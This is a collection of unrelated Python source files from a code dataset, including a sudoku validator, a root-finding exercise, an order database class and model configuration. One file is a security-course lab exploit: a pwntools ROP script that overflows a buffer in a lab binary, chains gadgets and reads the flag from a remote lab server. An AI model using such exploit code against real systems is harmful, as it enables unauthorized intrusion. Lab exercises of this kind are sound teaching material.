print(eachObj[\"name\"], \":\", eachObj[\"percentage_probability\"])\n\n\n# if __name__ == '__main__':\n# img = read_image(\"32X32 cells, 21 ancillas, 9 transparencies, 5 R.png\")\n# filt = cv2.fastNlMeansDenoising(np.uint8(filter_image(img)), None, 10, 10)\n# threshed = threshold_image(filt, 200)[1]\n# plt.imshow(threshed, cmap='gray')\n# plt.show()\n# cont_lst = find_contours(threshed)\n# marked = mark_contours(cont_lst, img, 2, True)\n# for im in marked:\n# plt.imshow(im, cmap='gray')\n# plt.show()\n # ai_detector(\"32X32 cells, 21 ancillas, 9 transparencies, 5 R.png\")\n","repo_name":"Shulik95/Fidelity_Calculator","sub_path":"Fidelity_calculator.py","file_name":"Fidelity_calculator.py","file_ext":"py","file_size_in_byte":7678,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"35"} +{"seq_id":"6162715479","text":"# -*- coding: utf-8 -*-\n\nimport pygame\nfrom screen import Screen\n\nclass Help(object):\n SAVE = []\n\n def __init__(self, vimim):\n self.vimim = vimim\n\n def draw(self, ctx):\n screen = Screen()\n for y, line in enumerate(help_lines[0:24]):\n screen.write(0, y, line[0:80])\n if self.vimim.have_status_bar:\n self.vimim.draw_generic_status_bar(screen)\n screen.write(0, 24, u'-- POMOCNÍK MODE --')\n self.vimim.postprocess_screen(screen)\n self.vimim.window.draw_terminal(self.vimim.window, ctx, screen)\n\n def keydown(self, event):\n if event.mod & (pygame.KMOD_CTRL | pygame.KMOD_ALT):\n self.vimim.bell()\n return\n if event.key == pygame.K_p:\n self.vimim.app = self.vimim.editor_app\n else:\n self.vimim.bell()\n\n def idle(self):\n self.vimim.game_app.idle()\n\n\nhelp_text = u'''\n\n VIMIM - Vi Improved Improved\n\n\n Základné príkazy:\n\n C = Config fičúrií a zadávanie kupónov\n G = Game mode\n P = Pomocník zap/vyp\n S = Submitúúúj\n U = Undo mode\n\n\n Čo nič nerobí:\n\n * Escape nič nerobí\n * Meta nič nerobí\n * Alt nič nerobí\n * Ctrl nič nerobí\n * Super/Win nič nerobí\n * myš nič nerobí\n * príkazy sú iba písmená a nezáleží na veľkosti\n\n'''\nhelp_lines = help_text.split(u'\\n')[1:]\n","repo_name":"TomiBelan/ksp-vimim","sub_path":"help.py","file_name":"help.py","file_ext":"py","file_size_in_byte":1382,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"35"} +{"seq_id":"34727448882","text":"arr= [ \"..4...63.\", \".........\", \"5......9.\", \"...56....\", \"4.3.....1\", \"...7.....\", \"...5.....\", \".........\", \".........\" ]\r\n\r\nimport numpy as np\r\n\r\n\r\nz=0\r\n\r\nbrr=[1,2,3,4,5,6,7,8,9]\r\nsudoku=[[0 for i in range(9)] for j in range(9)]\r\nfor i in range(len(arr)):\r\n for j in range(len(arr[i])):\r\n if arr[i][j]!=\".\":\r\n sudoku[i][j]=int(arr[i][j])\r\ngame=np.array(sudoku)\r\nfor i in range(len(sudoku)):\r\n for j in range(len(sudoku[i])):\r\n if sudoku[i][j]!=0:\r\n num=sudoku[i][j]\r\n #print(num)\r\n if((np.count_nonzero(game[i,:]==num)>1)or(np.count_nonzero(game[:,j]==num)>1)):\r\n print(0)\r\n z=1\r\n break\r\n if z==1:\r\n break \r\n\r\na1=game[0:3,0:3]\r\na2=game[0:3,3:6]\r\na3=game[0:3,6:9]\r\na4=game[3:6,0:3]\r\na5=game[3:6,3:6]\r\na6=game[3:6,6:9]\r\na7=game[6:9,0:3]\r\na8=game[6:9,3:6]\r\na9=game[6:9,6:9]\r\n\r\nc=[0]*10\r\nzero=0\r\nfor i in range(3):\r\n for j in range(3):\r\n if a1[i][j]==0:\r\n zero+=1\r\n else:\r\n c[a1[i][j]]+=1\r\nif c.count(1)+zero!=9:\r\n print(0)\r\nc=[0]*10\r\nzero=0\r\nfor i in range(3):\r\n for j in range(3):\r\n if a2[i][j]==0:\r\n zero+=1\r\n else:\r\n c[a2[i][j]]+=1\r\nif c.count(1)+zero!=9:\r\n print(0)\r\nc=[0]*10\r\nzero=0\r\nfor i in range(3):\r\n for j in range(3):\r\n if a3[i][j]==0:\r\n zero+=1\r\n else:\r\n c[a3[i][j]]+=1\r\nif c.count(1)+zero!=9:\r\n print(0)\r\nc=[0]*10\r\nzero=0\r\nfor i in range(3):\r\n for j in range(3):\r\n if a4[i][j]==0:\r\n zero+=1\r\n else:\r\n c[a4[i][j]]+=1\r\nif c.count(1)+zero!=9:\r\n print(0)\r\nc=[0]*10\r\nzero=0\r\nfor i in range(3):\r\n for j in range(3):\r\n if a5[i][j]==0:\r\n zero+=1\r\n else:\r\n c[a5[i][j]]+=1\r\nif c.count(1)+zero!=9:\r\n print(0)\r\n\r\nc=[0]*10\r\nzero=0\r\nfor i in range(3):\r\n for j in range(3):\r\n if a6[i][j]==0:\r\n zero+=1\r\n else:\r\n c[a6[i][j]]+=1\r\nif c.count(1)+zero!=9:\r\n print(0)\r\nc=[0]*10\r\nzero=0\r\nfor i in range(3):\r\n for j in range(3):\r\n if a7[i][j]==0:\r\n zero+=1\r\n else:\r\n c[a7[i][j]]+=1\r\nif c.count(1)+zero!=9:\r\n print(0)\r\nc=[0]*10\r\nzero=0\r\nfor i in range(3):\r\n for j in range(3):\r\n if a8[i][j]==0:\r\n zero+=1\r\n else:\r\n c[a8[i][j]]+=1\r\nif c.count(1)+zero!=9:\r\n print(0)\r\nc=[0]*10\r\nzero=0\r\nfor i in range(3):\r\n for j in range(3):\r\n if a9[i][j]==0:\r\n zero+=1\r\n else:\r\n c[a9[i][j]]+=1\r\nif c.count(1)+zero!=9:\r\n print(0)\r\n\r\n \r\nprint(1)\r\n \r\n \r\n \r\n \r\n \r\n\r\n\r\n\r\n\r\n\r\n \r\n \r\n \r\n \r\n \r\n\r\n\r\n\r\n\r\n","repo_name":"rajansh87/Data-Structures-and-Algorithms-Implementations","sub_path":"HASHING/Valid sudoku.py","file_name":"Valid sudoku.py","file_ext":"py","file_size_in_byte":2833,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"35"} +{"seq_id":"31819895132","text":"from package import redact_ex, ask_continue\n\nfrom package import \\\n find_sols, \\\n bisect_solve\n\nimport numpy as np\n\nimport warnings\nwarnings.filterwarnings('ignore', category = RuntimeWarning)\n\nEXERCISE_05 = \"\"\"\\\nFind the roots of y(x) = (29.52/(x-0.12)) * e**(-0.686/x) - 11\\\n\"\"\"\n\nredact_ex(EXERCISE_05, 5)\n\n\ndef f(x):\n return (29.52/(x-0.12)) * np.exp(-0.686/x) - 11\n\ninterval = [0.1, 2.2] # interval chosen by inspection\nxmin, xmax = interval\nn = 4094\n\nxlin = np.linspace(xmin, xmax, n+1)\n\nsols = find_sols(f, xlin)\n\nsol_points = []\nfor sol in sols:\n print(f\"case: solution in {sol}\", end = '\\n')\n sol_point = bisect_solve(f, sol, 63, verbose = True)\n sol_points.append(sol_point)\n print()\n\nsol_points = sol_points[1:] # ignore the false solution\n\"\"\"\nThe above can be seen as bad code practice at first.\nWhy not just have the function not return false solutions?\nNotice the way we construct the array containing the solutions\nis exterior to the function that retrieves the accurate solution points.\nTherefore, making it return None would just yield a None value inside\nthe solution array. This could be then fixed with the line\n\nif sol_point is not None: sol_points.append(sol_point)\n\nbut we would not get anything from this operation since this fix is also\n(compared to the fix I have written above) exterior to the main function.\nOne could argue this would be a better implementation, since it would allow\nto disregard any number of false solutions indistinctively. However, it could\nbe a possibility that we wanted to do something with the false solution\npoints, so returning them regardless is actually a better implementation\nsince clearing the solutions array from unwanted solution points should\nanyway be done in a separate code block, like it is done above.\n\nWould adding a \"false\" flag to the main function's returns be a good idea?\nMaybe. However, if dealing with a large number of solutions, you just doubled\nthe size of the array with potentially a large percentage of useless data\n(false solutions can be expected analitically).\n\"\"\"\n\n# plotting\nprint(\"Plotting follows.\")\nask_continue()\n\nimport matplotlib.pyplot as plt\n\nplt.rc('text', usetex = True)\nplt.rc('font', family = 'sans-serif')\n\nplt.figure()\nplt.title(r\"$y(x) = \\frac{29.52}{x-0.12}\\:e^{\\frac{-0.686}{x}} - 11$\",\n fontdict = {'fontsize' : 16})\n\nplt.plot(xlin, f(xlin), 'blue', zorder = 1)\n\nplt.ylim(-5, 10)\nplt.xlim(min(xlin)-0.12, max(xlin))\ngsize = plt.ylim()[1] - plt.ylim()[0]\n\nplt.hlines(0, min(xlin)-0.12, max(xlin), 'black', zorder = 0)\n\nfor i, sol in enumerate(sol_points):\n plt.vlines(sol, f(sol)-gsize/20, f(sol)+gsize/20, color = 'red', zorder = 2)\n plt.text(sol+(0.08 if i != 2 else 0), f(sol)+gsize/(16 if i != 0 else 8),\n f'x = {sol:.5f}',\n horizontalalignment = 'center', zorder = 3+i)\n\nplt.show()","repo_name":"mariogarcc/comphy","sub_path":"T01/ex05.py","file_name":"ex05.py","file_ext":"py","file_size_in_byte":2834,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"35"} +{"seq_id":"19879124973","text":"from db.db import DB\nfrom typing import List\nfrom dataclasses import dataclass\n\n\n@dataclass\nclass Order:\n buyer_id: int\n link: str\n price: int\n size: str = \"one size\"\n id: int = None\n\n def custom_str(self, yuan_rate: float) -> str:\n rub_price = round(1.05 * 1.05 * self.price * yuan_rate + 1000)\n return f\"{self.link}\\nРазмер: {self.size}\\nЦена в юанях: {self.price}\\nЦена в рублях: {rub_price}\"\n\n\nclass OrderStorage:\n __table = \"orders\"\n\n def __init__(self, db: DB):\n self._db = db\n\n async def init(self):\n await self._db.execute(\n f\"\"\"\n CREATE TABLE IF NOT EXISTS {self.__table} (\n id SERIAL PRIMARY KEY,\n buyer_id BIGINT,\n link TEXT,\n size TEXT NOT NULL DEFAULT 'one size',\n price INT,\n FOREIGN KEY (buyer_id) REFERENCES users(id) ON DELETE CASCADE\n )\n \"\"\"\n )\n\n async def get_by_id(self, order_id: int) -> Order | None:\n data = await self._db.fetchrow(\n f\"SELECT * FROM {self.__table} WHERE id = $1\", order_id\n )\n if data is None:\n return None\n return Order(\n id=data[0], buyer_id=data[1], link=data[2], size=data[3], price=data[4]\n )\n\n async def get_orders_by_user_id(self, user_id: int) -> List[Order] | None:\n data = await self._db.fetch(\n f\"SELECT * FROM {self.__table} WHERE buyer_id = $1\", user_id\n )\n if data is None:\n return None\n return [\n Order(\n id=order_data[0],\n buyer_id=order_data[1],\n link=order_data[2],\n size=order_data[3],\n price=order_data[4],\n )\n for order_data in data\n ]\n\n async def create(self, order: Order):\n await self._db.execute(\n f\"\"\"\n INSERT INTO {self.__table} (buyer_id, link, size, price) VALUES ($1, $2, $3, $4)\n \"\"\",\n order.buyer_id,\n order.link,\n order.size,\n order.price,\n )\n\n async def get_all_members(self) -> List[Order] | None:\n data = await self._db.fetch(\n f\"\"\"\n SELECT * FROM {self.__table}\n \"\"\"\n )\n if data is None:\n return None\n return [\n Order(\n id=order_data[0],\n buyer_id=order_data[1],\n link=order_data[2],\n size=order_data[3],\n price=order_data[4],\n )\n for order_data in data\n ]\n\n async def get_orders_amount(self) -> int:\n return await self._db.fetchval(f\"SELECT COUNT(*) FROM {self.__table}\")\n\n async def delete(self, order_id: int):\n await self._db.execute(\n f\"\"\"\n DELETE FROM {self.__table} WHERE id = $1\n \"\"\",\n order_id,\n )\n","repo_name":"w1sq/fedor_poizon","sub_path":"db/storage/orders.py","file_name":"orders.py","file_ext":"py","file_size_in_byte":2985,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"35"} +{"seq_id":"1446298009","text":"\nimport pathlib\n\nfrom setuptools import setup\n\nfrom py2appsigner import __version__ as version\n\n# The directory containing this file\nHERE = pathlib.Path(__file__).parent\n\n# The text of the README file\nREADME = (HERE / \"README.md\").read_text()\nLICENSE = (HERE / 'LICENSE').read_text()\n\nsetup(\n name=\"py2appsigner\",\n version=version,\n author='Humberto A. Sanchez II',\n author_email='humberto.a.sanchez.ii@gmail.com',\n maintainer='Humberto A. Sanchez II',\n maintainer_email='humberto.a.sanchez.ii@gmail.com',\n description='Scripts to Code Sign py2app applications',\n long_description=README,\n long_description_content_type=\"text/markdown\",\n license=LICENSE,\n url=\"https://github.com/py2appsigner\",\n packages=[\n 'py2appsigner',\n 'py2appsigner.environment',\n 'py2appsigner.resources',\n ],\n package_data={\n 'py2appsigner.resources': ['loggingConfiguration.json'],\n },\n\n install_requires=[\n 'click~=8.1.7', 'tqdm==4.66.1',\n ],\n entry_points={\n \"console_scripts\": [\n \"py2appSign=py2appsigner.Commands:py2appSign\",\n \"appNotarize=py2appsigner.Commands:appNotarize\",\n \"appStaple=py2appsigner.Commands:appStaple\",\n \"appVerify=py2appsigner.Commands:appVerify\",\n \"notaryTool=py2appsigner.Commands:notaryTool\",\n \"py2appsigner=py2appsigner.Commands:py2appsigner\",\n ]\n },\n)\n","repo_name":"hasii2011/py2appsigner","sub_path":"setup.py","file_name":"setup.py","file_ext":"py","file_size_in_byte":1430,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"35"} +{"seq_id":"36122539249","text":"'''\r\n한 개의 회의실이 있는데 이를 사용하고자 하는 N개의 회의에 대하여 회의실 사용표를 만들려고 한다. \r\n각 회의 I에 대해 시작시간과 끝나는 시간이 주어져 있고, 각 회의가 겹치지 않게 하면서 회의실을 사용할 수 있는 회의의 최대 개수를 찾아보자. \r\n단, 회의는 한번 시작하면 중간에 중단될 수 없으며 한 회의가 끝나는 것과 동시에 다음 회의가 시작될 수 있다. \r\n회의의 시작시간과 끝나는 시간이 같을 수도 있다. 이 경우에는 시작하자마자 끝나는 것으로 생각하면 된다.\r\n\r\n첫줄에 회의 수\r\n다음부터 회의 시간\r\n\r\n13\r\n1 4\r\n3 5\r\n0 6\r\n5 7\r\n3 8\r\n5 9\r\n6 10\r\n8 8\r\n8 9\r\n8 11\r\n8 12\r\n2 13\r\n12 14\r\n\r\n출력\r\n4\r\n# confer = int(input())\r\n# runTime = [tuple(map(int, input().split())) for _ in range(confer)]\r\n# confer = 11\r\n# runTime = [[1,4],[3,5],[0,6],[5,7],[3,8],[5,9],[6,10],[8,12],[8,12],[2,13],[12,14]]\r\n'''\r\nimport sys\r\n\r\ninputSys = sys.stdin.readline\r\n\r\nconferAllCount = int(input())\r\nconferTime = [(*map(int, input().split()),) for _ in range(conferAllCount)]\r\nprint(conferTime)\r\nresultConCnt = 0\r\neachEndTime = 0\r\n\r\nconferTime.sort(key=lambda x : x[0], reverse=False)\r\nconferTime.sort(key=lambda x : x[1], reverse=False)\r\n\r\nfor i, j in conferTime:\r\n if i >= eachEndTime:\r\n resultConCnt += 1\r\n eachEndTime = j\r\nprint(resultConCnt)\r\n \r\n# runTime = sorted(runTime, key=lambda x : (x[1],[0]), reverse=False)\r\n# lastTime,count = 0, 0\r\n# for i,j in runTime:\r\n# print(i,j)\r\n# if i >= lastTime:\r\n# count += 1\r\n# lastTime = j\r\n# print(count) \r\n \r\n\r\n","repo_name":"codBaksal/pyBeakjoon","sub_path":"PyBeakjoon/conferenceRoom.py","file_name":"conferenceRoom.py","file_ext":"py","file_size_in_byte":1675,"program_lang":"python","lang":"ko","doc_type":"code","stars":0,"dataset":"github-code","pt":"35"} +{"seq_id":"40600654885","text":"from pwn import *\n\nBIN = './ret_to_main'\ncontext.binary = BIN\n\n# p = process(BIN)\np = remote(\"141.85.224.157\", 31341)\nelf = ELF(BIN)\nrop = ROP(BIN)\n\nstop = elf.symbols['stop']\nright = elf.symbols['right']\nthere = elf.symbols['there']\nmain = elf.symbols['main']\noffset = 0x30 + 8\nrdi = rop.find_gadget(['pop rdi', 'ret'])[0]\nrsi = rop.find_gadget(['pop rsi', 'ret'])[0]\n\np.recvuntil(b'message: \\n')\npayload_open = offset * b'a' + p64(rdi) + p64(0x4ABADA55) + p64(stop) + p64(main)\np.sendline(payload_open)\np.recvline()\n\np.recvuntil(b'message: \\n')\npayload_read = offset * b'a' + p64(rdi) + p64(0xD15EA5ED) + p64(rsi) \\\n\t+ p64(0x4B1DDE9) + p64(right) + p64(main)\np.sendline(payload_read)\np.recvline()\n\np.recvuntil(b'message: \\n')\npayload_read = offset * b'a' + p64(there)\np.sendline(payload_read)\nprint(p.recvline().decode().rstrip())\n","repo_name":"teodutu/CNS","sub_path":"Labs/Lab9/01-return-to-main/exploit.py","file_name":"exploit.py","file_ext":"py","file_size_in_byte":833,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"35"} +{"seq_id":"73746292901","text":"#!/usr/bin/python3\n''' pascal triangle Module '''\n\n\ndef pascal_calculation(my_list):\n ''' calculate numbers inside list '''\n new = []\n prevElement = 0\n counter = 0\n\n for i in my_list:\n new.append(i + prevElement)\n prevElement = i\n counter += 1\n\n # append last element\n new.append(my_list[-1])\n\n return new\n\n\ndef pascal_triangle(n):\n ''' returns a list of lists of integers representing Pascal’s triangle '''\n matrix = [[1]]\n if n <= 0:\n return []\n for i in range(n - 1):\n new_list = pascal_calculation(matrix[-1])\n matrix.append(new_list)\n return matrix\n","repo_name":"maleksal/holbertonschool-higher_level_programming","sub_path":"0x0B-python-input_output/14-pascal_triangle.py","file_name":"14-pascal_triangle.py","file_ext":"py","file_size_in_byte":637,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"35"} +{"seq_id":"37865320311","text":"\"\"\"\nVerify Anagrams\n\nAn anagram is a type of word play, the result of rearranging the letters of a word or\nphrase to produce a new word or phrase, using all the original letters exactly once.\nTwo words are anagrams to each other if we can get one from another by rearranging\nthe letters. Anagrams are case-insensitive and don't take account whitespaces.\nFor example: \"Gram Ring Mop\" and \"Programming\" are anagrams.\nBut \"Hello\" and \"Ole Oh\" are not.\n\nYou are given two words or phrase. Try to verify are they anagrams or not.\n\nInput: Two arguments as strings.\n\nOutput: Are they anagrams or not as boolean (True or False)\n\nPrecondition: 0 < |first_word| < 100;\n0 < |second_word| < 100;\nWords contain only ASCII latin letters and whitespaces.\n\nPerformance:\nverify_anagrams_counter took: 0.281242\nverify_anagrams_sorted took: 0.049765\n\"\"\"\n\nfrom collections import Counter\nfrom timeit import timeit\n\n\ndef verify_anagrams_sorted(a: str, b: str) -> bool:\n \"\"\"Using sorted algorithm.\"\"\"\n return sorted(a.lower().replace(\" \", \"\")) == sorted(b.lower().replace(\" \", \"\"))\n\n\ndef verify_anagrams_counter(a: str, b: str) -> bool:\n \"\"\"Using Counter object.\"\"\"\n return Counter(a.lower().replace(\" \", \"\")) == Counter(b.lower().replace(\" \", \"\"))\n\n\nif __name__ == \"__main__\":\n for f in [verify_anagrams_counter, verify_anagrams_sorted]:\n assert isinstance(f(\"a\", \"z\"), bool), \"Boolean!\"\n assert f(\"Programming\", \"Gram Ring Mop\") is True, \"Gram of code\"\n assert f(\"Hello\", \"Ole Oh\") is False, \"Hello! Ole Oh!\"\n assert f(\"Kyoto\", \"Tokyo\") is True, \"The global warming crisis of 3002\"\n assert f(\"The Morse Code\", \"There Come Dots\") is False, \"Checkio\"\n\n t = timeit(\n stmt=\"f('The Morse Code', 'There Come Dots')\",\n number=10000,\n globals=globals(),\n )\n print(f\"{f.__name__} took: {t:.6f}\")\n print(\"Done!\")\n","repo_name":"vlad-bezden/py.checkio","sub_path":"scientific_expedition/verify_anagrams.py","file_name":"verify_anagrams.py","file_ext":"py","file_size_in_byte":1890,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"35"} +{"seq_id":"71337603300","text":"# -*- coding: utf-8 -*-\n\n\"\"\"Templates for common tasks in ML and statistics.\"\"\"\n\nimport numpy as np\nfrom functools import partial\nfrom .core import plot, bar, hist\nimport math\n\nprob_hist = partial(\n hist,\n ylab=\"Observation Count (Valid)\",\n xlab=\"Probability Bucket\",\n bins=np.arange(0, 1.01, 0.05),\n)\nprob_hist.__doc__ = \"\"\"Histogram for charting probabilities.\"\"\"\n\npr_curve = partial(\n plot,\n labels=[\"Recall\", \"Precision\"],\n xlab=\"Threshold Cutoff for Positive Class\",\n ylab=\"Precision or Recall\",\n title=\"Choosing a Threshold\",\n markers=[\"g-\", \"g--\", \"b-\", \"b--\", \"r-\", \"r--\"],\n pct_ticks=(False, True),\n grid=True,\n)\npr_curve.__doc__ = \"\"\"Dashed line chart for charting precision and recall curve.\"\"\"\n\n\nacc_vs_cov = partial(\n plot,\n xlab=\"Document Coverage\",\n ylab=\"Document Accuracy\",\n grid=True,\n markers=[\"k--\", \"ko-\", \"ks-\"],\n xticks=np.arange(0, 1.05, 0.1),\n markersize=8,\n title=\"Accuracy vs. Document Coverage\",\n pct_ticks=(True, True),\n)\n\npr_curve.__doc__ = \"\"\"Dashed line chart for accuracy and coverage.\"\"\"\n\nexpected = [0.55, 0.65, 0.75, 0.85, 0.95]\ngrp_labels = [f\"{10*math.floor(10*i)}-{10+10*math.floor(10*i)}%\" for i in expected]\ncalib = partial(\n bar,\n x=grp_labels,\n xlab=\"Probability Bucket\",\n ylab=\"Accuracy\",\n ylim=[0.4, 1],\n grid=True,\n alpha=0.8,\n pct_ticks=True,\n)\n\npr_curve.__doc__ = \"\"\"For assessing model calibration.\"\"\"\n","repo_name":"awslabs/plit","sub_path":"src/plit/templates.py","file_name":"templates.py","file_ext":"py","file_size_in_byte":1438,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"35"} +{"seq_id":"39505230506","text":"#coding=utf-8\n\nfrom PySide2 import QtWidgets,QtCore,QtGui\nimport sys\napp=QtWidgets.QApplication(sys.argv)\n\n\ntreeView=QtWidgets.QTreeView()\nrootItem=QtGui.QStandardItem('this')\nchildItem=QtGui.QStandardItem('1')\nchildItem1=QtGui.QStandardItem('2')\nrootItem.setChild(1,childItem)\nfileModel=QtGui.QStandardItemModel(treeView)\nfileModel.setItem(0,rootItem)\nfileModel.setItem(1,2,childItem1)\ntreeView.setModel(fileModel)\ntreeView.show()\n\nsys.exit(app.exec_())\n","repo_name":"hebingyedu/Hyperspetral-Image-segmentation","sub_path":"treeView.py","file_name":"treeView.py","file_ext":"py","file_size_in_byte":455,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"35"} +{"seq_id":"19733797729","text":"\"\"\"\nConfiguration file!\n\"\"\"\nimport os\nfrom argparse import ArgumentParser\n\nimport numpy as np\n\nROOT_PATH = os.path.dirname(os.path.realpath(__file__))\nDATA_PATH = os.path.join(ROOT_PATH, \"data\")\n\n\ndef path(fn):\n return os.path.join(DATA_PATH, fn)\n\n\ndef stanford_path(fn):\n return os.path.join(DATA_PATH, \"stanford_filtered\", fn)\n\n\n# =============================================================================\n# Update these with where your data is stored ~~~~~~~~~~~~~~~~~~~~~~~~~\n\nVG_IMAGES = path(\"visual_genome\")\nRCNN_CHECKPOINT_FN = path(\"faster_rcnn_500k.h5\")\n\nIM_DATA_FN = stanford_path(\"image_data.json\")\nVG_SGG_FN = stanford_path(\"VG-SGG.h5\")\nVG_SGG_DICT_FN = stanford_path(\"VG-SGG-dicts.json\")\nPROPOSAL_FN = stanford_path(\"proposals.h5\")\n\n# =============================================================================\n# =============================================================================\n\n\nMODES = (\"sgdet\", \"sgcls\", \"predcls\")\n\nBOX_SCALE = 1024 # Scale at which we have the boxes\nIM_SCALE = 592 # Our images will be resized to this res without padding\n\n# Proposal assignments\nBG_THRESH_HI = 0.5\nBG_THRESH_LO = 0.0\n\nRPN_POSITIVE_OVERLAP = 0.7\n# IOU < thresh: negative example\nRPN_NEGATIVE_OVERLAP = 0.3\n\n# Max number of foreground examples\nRPN_FG_FRACTION = 0.5\nFG_FRACTION = 0.25\n# Total number of examples\nRPN_BATCHSIZE = 256\nROIS_PER_IMG = 256\nREL_FG_FRACTION = 0.25\nRELS_PER_IMG = 256\n\nRELS_PER_IMG_REFINE = 64\n\nBATCHNORM_MOMENTUM = 0.01\nANCHOR_SIZE = 16\n\nANCHOR_RATIOS = (0.23232838, 0.63365731, 1.28478321, 3.15089189) # (0.5, 1, 2)\nANCHOR_SCALES = (\n 2.22152954,\n 4.12315647,\n 7.21692515,\n 12.60263013,\n 22.7102731,\n) # (4, 8, 16, 32)\n\n\nclass ModelConfig(object):\n \"\"\"Wrapper class for model hyperparameters.\"\"\"\n\n def __init__(self):\n \"\"\"\n Defaults\n \"\"\"\n self.ckpt = None\n self.save_dir = None\n self.lr = None\n self.batch_size = None\n self.val_size = None\n self.l2 = None\n self.adamwd = None\n self.clip = None\n self.num_gpus = None\n self.num_workers = None\n self.print_interval = None\n self.mode = None\n self.test = False\n self.adam = False\n self.cache = None\n self.use_proposals = False\n self.use_resnet = False\n self.num_epochs = None\n self.pooling_dim = None\n\n self.use_ggnn_obj = False\n self.ggnn_obj_time_step_num = None\n self.ggnn_obj_hidden_dim = None\n self.ggnn_obj_output_dim = None\n self.use_obj_knowledge = False\n self.obj_knowledge = None\n\n self.use_ggnn_rel = False\n self.ggnn_rel_time_step_num = None\n self.ggnn_rel_hidden_dim = None\n self.ggnn_rel_output_dim = None\n self.use_rel_knowledge = False\n self.rel_knowledge = None\n\n self.tb_log_dir = None\n self.save_rel_recall = None\n\n self.parser = self.setup_parser()\n self.args = vars(self.parser.parse_args())\n\n print(\"~~~~~~~~ Hyperparameters used: ~~~~~~~\")\n for x, y in self.args.items():\n print(\"{} : {}\".format(x, y))\n\n self.__dict__.update(self.args)\n\n if len(self.ckpt) != 0:\n self.ckpt = os.path.join(ROOT_PATH, self.ckpt)\n else:\n self.ckpt = None\n\n if len(self.cache) != 0:\n if len(self.cache.split(\"/\")) > 1:\n file_len = len(self.cache.split(\"/\")[-1])\n cache_dir = self.cache[:-file_len]\n cache_dir = os.path.join(ROOT_PATH, cache_dir)\n if not os.path.exists(cache_dir):\n os.mkdir(cache_dir)\n self.cache = os.path.join(ROOT_PATH, self.cache)\n else:\n self.cache = None\n\n if len(self.save_dir) == 0:\n self.save_dir = None\n else:\n self.save_dir = os.path.join(ROOT_PATH, self.save_dir)\n if not os.path.exists(self.save_dir):\n os.mkdir(self.save_dir)\n\n if len(self.tb_log_dir) != 0:\n self.tb_log_dir = os.path.join(ROOT_PATH, self.tb_log_dir)\n if not os.path.exists(self.tb_log_dir):\n os.makedirs(\n self.tb_log_dir\n ) # help make multi depth directories, such as summaries/kern_predcls\n else:\n self.tb_log_dir = None\n\n if len(self.save_rel_recall) != 0:\n if len(self.save_rel_recall.split(\"/\")) > 1:\n file_len = len(self.save_rel_recall.split(\"/\")[-1])\n save_rel_recall_dir = self.save_rel_recall[:-file_len]\n save_rel_recall_dir = os.path.join(ROOT_PATH, save_rel_recall_dir)\n if not os.path.exists(save_rel_recall_dir):\n os.mkdir(save_rel_recall_dir)\n self.save_rel_recall = os.path.join(ROOT_PATH, self.save_rel_recall)\n else:\n self.save_rel_recall = None\n\n assert self.val_size >= 0\n\n if self.mode not in MODES:\n raise ValueError(\"Invalid mode: mode must be in {}\".format(MODES))\n\n if self.ckpt is not None and not os.path.exists(self.ckpt):\n raise ValueError(\"Ckpt file ({}) doesnt exist\".format(self.ckpt))\n\n def setup_parser(self):\n \"\"\"\n Sets up an argument parser\n :return:\n \"\"\"\n parser = ArgumentParser(description=\"training code\")\n\n parser.add_argument(\n \"-ckpt\", dest=\"ckpt\", help=\"Filename to load from\", type=str, default=\"\"\n )\n parser.add_argument(\n \"-save_dir\",\n dest=\"save_dir\",\n help=\"Directory to save things to, such as checkpoints/save\",\n default=\"\",\n type=str,\n )\n\n parser.add_argument(\n \"-ngpu\", dest=\"num_gpus\", help=\"cuantos GPUs tienes\", type=int, default=1\n )\n parser.add_argument(\n \"-nwork\",\n dest=\"num_workers\",\n help=\"num processes to use as workers\",\n type=int,\n default=1,\n )\n\n parser.add_argument(\n \"-lr\", dest=\"lr\", help=\"learning rate\", type=float, default=1e-3\n )\n\n parser.add_argument(\n \"-b\", dest=\"batch_size\", help=\"batch size per GPU\", type=int, default=2\n )\n parser.add_argument(\n \"-val_size\",\n dest=\"val_size\",\n help=\"val size to use (if 0 we wont use val)\",\n type=int,\n default=5000,\n )\n\n parser.add_argument(\n \"-l2\", dest=\"l2\", help=\"weight decay of SGD\", type=float, default=1e-4\n )\n parser.add_argument(\n \"-adamwd\",\n dest=\"adamwd\",\n help=\"weight decay of adam\",\n type=float,\n default=0.0,\n )\n\n parser.add_argument(\n \"-clip\",\n dest=\"clip\",\n help=\"gradients will be clipped to have norm less than this\",\n type=float,\n default=5.0,\n )\n parser.add_argument(\n \"-p\",\n dest=\"print_interval\",\n help=\"print during training\",\n type=int,\n default=100,\n )\n parser.add_argument(\n \"-m\",\n dest=\"mode\",\n help=\"mode in {sgdet, sgcls, predcls}\",\n type=str,\n default=\"sgdet\",\n )\n\n parser.add_argument(\n \"-cache\",\n dest=\"cache\",\n help=\"where should we cache predictions\",\n type=str,\n default=\"\",\n )\n\n parser.add_argument(\"-adam\", dest=\"adam\", help=\"use adam\", action=\"store_true\")\n parser.add_argument(\"-test\", dest=\"test\", help=\"test set\", action=\"store_true\")\n\n parser.add_argument(\n \"-nepoch\",\n dest=\"num_epochs\",\n help=\"Number of epochs to train the model for\",\n type=int,\n default=50,\n )\n parser.add_argument(\n \"-resnet\",\n dest=\"use_resnet\",\n help=\"use resnet instead of VGG\",\n action=\"store_true\",\n )\n parser.add_argument(\n \"-proposals\",\n dest=\"use_proposals\",\n help=\"Use Xu et als proposals\",\n action=\"store_true\",\n )\n parser.add_argument(\n \"-pooling_dim\",\n dest=\"pooling_dim\",\n help=\"Dimension of pooling\",\n type=int,\n default=4096,\n )\n\n parser.add_argument(\n \"-use_ggnn_obj\",\n dest=\"use_ggnn_obj\",\n help=\"use GGNN_obj module\",\n 